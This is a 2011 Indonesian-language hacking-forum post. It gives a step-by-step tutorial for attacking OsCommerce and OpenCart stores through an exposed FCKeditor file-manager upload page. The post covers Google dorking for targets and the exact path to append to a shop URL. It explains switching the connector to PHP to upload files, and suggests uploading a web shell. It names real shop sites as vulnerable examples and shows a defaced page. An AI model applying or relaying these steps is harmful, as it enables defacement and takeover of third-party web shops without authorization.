[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Hacking » Hack » Powered By OsCommerce atau Powered By OpenCart Vulnerab (satria__)
Powered By OsCommerce atau Powered By OpenCart Vulnerab
satriaDate: Monday, 2011-03-28, 7:40 AM | Message # 1
Lieutenant colonel
Group: Administrators
Messages: 126
Reputation: 0
Status: Offline
maaf jika beberapa minggu ini saya tidak memposting di blog kesayangan saya ini. dan maaf jika postingan kali ini beberapa teman-teman dan master-master sekalian udah pada tahu smile
cuma ini hanya sekedar share informasi saja smile

TUTORIAL

1. searching target dengan dork "Powered By OsCommerce " atau "Powered By OpenCart" di google, Bing, Atau apa saja deh ..

2. tentukan target ..

3. Setelah menemukan target tambahkan code Dibawah ini :
"admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html" dibelakang Url/Target (Tanpa tanda kutip)

Exs : http://www.springfieldxd.info/buy/index.php?route=product/product&product_id=57

Jadinya adalah : http://www.springfieldxd.info/buy/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. Setelah itu kamu akan menemukan file untuk upload,

5. Untuk Conector, Ganti Asp menjadi PHP file smile

6. Nah sekarang tinggal upload file kalian...!!! Contoh : upload sitelamu.html

Dan hasilnya adalah http://www.target.com/file-kamu.html

Contoh target yang vuln :

http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
dan hasilnya : http://www.schoolshopper.com.au/blood.html

Nb : Jika Anda Beruntung, Anda Juga Bisa Melakukan Upload Shell Kedalam Target smile
Untuk Dork, Gunakan Imajinasi kalian dalam memperluar dork tersebut.

Sekian Postingan Saya Kali Ini, Semoga Berguna Bagi Teman-Teman Semua, Amin.
Prorebell

 
Forum » Hacking » Hack » Powered By OsCommerce atau Powered By OpenCart Vulnerab (satria__)
  • Page 1 of 1
  • 1
Search: